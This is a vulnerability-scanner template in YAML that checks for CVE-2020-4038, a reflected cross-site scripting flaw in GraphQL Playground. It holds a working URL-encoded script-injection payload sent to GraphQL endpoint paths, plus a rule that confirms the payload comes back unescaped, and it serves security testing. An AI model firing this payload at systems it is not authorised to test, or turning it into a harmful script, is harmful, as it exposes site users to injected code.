id: CVE-2020-4038
info:
  name: Graphql Playground XSS
  risk: Medium

params:
  - root: '{{.BaseURL}}'

variables:
  - graph: |
      /graphql/
      /apis/dashboards/v1/graphql/
  - xss: |
      %3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
requests:
  - method: GET
    redirect: false
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
      - Upgrade-Insecure-Requests: 1
      - Accept: text/html
      - Accept-Encoding: gzip, deflate
      - Accept-Language: en-US,en;q=0.9
    url: >-
     {{.root}}{{.graph}}{{.xss}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", "text/html") && StringSearch("body", '<script>alert(1)</script>')

references:
  - link: https://github.com/prisma-labs/graphql-playground/security/advisories/GHSA-4852-vrh7-28rf
  - https://www.cvebase.com/cve/2020/4038